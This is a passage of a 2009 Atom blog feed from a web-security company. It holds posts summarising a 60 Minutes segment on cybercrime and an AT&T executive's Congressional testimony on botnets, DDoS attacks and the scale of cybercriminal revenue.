type='application/atom+xml' href='http://blog.dasient.com/feeds/7838621224368595711/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/04/registercom-victim-of-ddos-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7838621224368595711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/7838621224368595711'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/04/registercom-victim-of-ddos-attack.html' title='Register.com a victim of DDOS 
attack'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-1334276801906969797</id><published>2009-03-31T10:13:00.000-07:00</published><updated>2009-03-31T11:17:12.400-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='60Minutes'/><category scheme='http://www.blogger.com/atom/ns#' term='cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='CBS'/><title type='text'>Internet Security covered in 60 Minutes</title><content type='html'>Last Sunday, 60 Minutes, a news program on CBS, &lt;a href="http://www.cbsnews.com/stories/2009/03/27/60minutes/main4897053.shtml"&gt;&lt;span style="text-decoration: underline;"&gt;reported a story about Internet security and cybercrime&lt;/span&gt;&lt;/a&gt;. 
The program had some interesting stories and stats, namely:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;The hackers are busy&lt;/span&gt;: According to Symantec, "the hackers are inventing up to 15,000 new infections every day, designed specifically to get around the latest anti-virus protections."&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;1 in 4 Americans affected by Internet viruses&lt;/span&gt;: "But tens of millions of people have--one in four Americans, according to recent reports, as the hackers get more and more sophisticated."&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Fame and fortune for the hackers&lt;/span&gt;: "A single hacker can make $30,000 a month and be championed in local newspapers."&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Is the Internet in trouble?&lt;/span&gt; "Would you make the statement, 'The Internet in trouble?'" Stahl asked &lt;a href="http://cyber.law.harvard.edu/people/jzittrain"&gt;Jonathan Zittrain&lt;/a&gt;, Harvard Professor and &lt;a href="http://stopbadware.org/home/index"&gt;co-founder of StopBadware.org&lt;/a&gt;. 
"Yes, without hesitation," Zittrain replied.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;It's great that mainstream media is raising public awareness of these problems!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-1334276801906969797?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/1334276801906969797/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/03/internet-security-covered-in-60-minutes.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/1334276801906969797'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/1334276801906969797'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/03/internet-security-covered-in-60-minutes.html' title='Internet Security covered in 60 Minutes'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-6400856380203410164</id><published>2009-03-27T10:36:00.000-07:00</published><updated>2009-03-27T11:22:20.634-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DDOS'/><category scheme='http://www.blogger.com/atom/ns#' term='cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='scale'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='ATT'/><title type='text'>Cybercrime more lucrative than the global drug business</title><content 
type='html'>AT&amp;amp;T's Chief Security Officer, Ed Amoroso, &lt;a href="http://tinyurl.com/cgqfx9"&gt;testified to Congress recently&lt;/a&gt; about the size and scope of global cybercriminal activity. In his testimony, he says, "Last year the FBI announced that revenues from cyber-crime, for the first time ever, &lt;span style="font-weight: bold;"&gt;exceeded drug trafficking as the most lucrative illegal global business&lt;/span&gt;, estimated at reaping more than &lt;span style="font-weight: bold;"&gt;$1 trillion&lt;/span&gt; annually in illicit profits."&lt;br /&gt;&lt;br /&gt;The primary activity he warns Congress about is the threat of cyber-warfare. An example of this is where criminals or terrorists seize control of a large number of PCs via a botnet, and use those nodes to launch a large-scale distributed denial of service (DDOS) attack against US interests. He cites the example of Estonia, where 2 years ago a large-scale cyber attack produced catastrophic results:  "The entire country was disconnected from the  Internet."&lt;br /&gt;&lt;br /&gt;Certainly, DDOS attacks, botnets and cyber-warfare are among the most dangerous cyber-security threats to the US and to the Internet as a whole. What is even more alarming is the massive scale and scope of cybercriminal activity as a whole: $1 trillion, larger than even the global drug trade. It will take significant effort and coordination between governments and the private sector to address these threats. We at Dasient have already joined this effort. 
Look for future announcements from us about how we are addressing the growing threat of cybercrime.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-6400856380203410164?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/6400856380203410164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/03/cybercrime-more-lucrative-than-global.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6400856380203410164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6400856380203410164'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/03/cybercrime-more-lucrative-than-global.html' title='Cybercrime more lucrative than the global drug business'/><author><name>Ameet</name><uri>http://www.blogger.com/profile/18432893671270222537</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='17772997342166647868'/></author><thr:total>1</thr:total></entry></feed>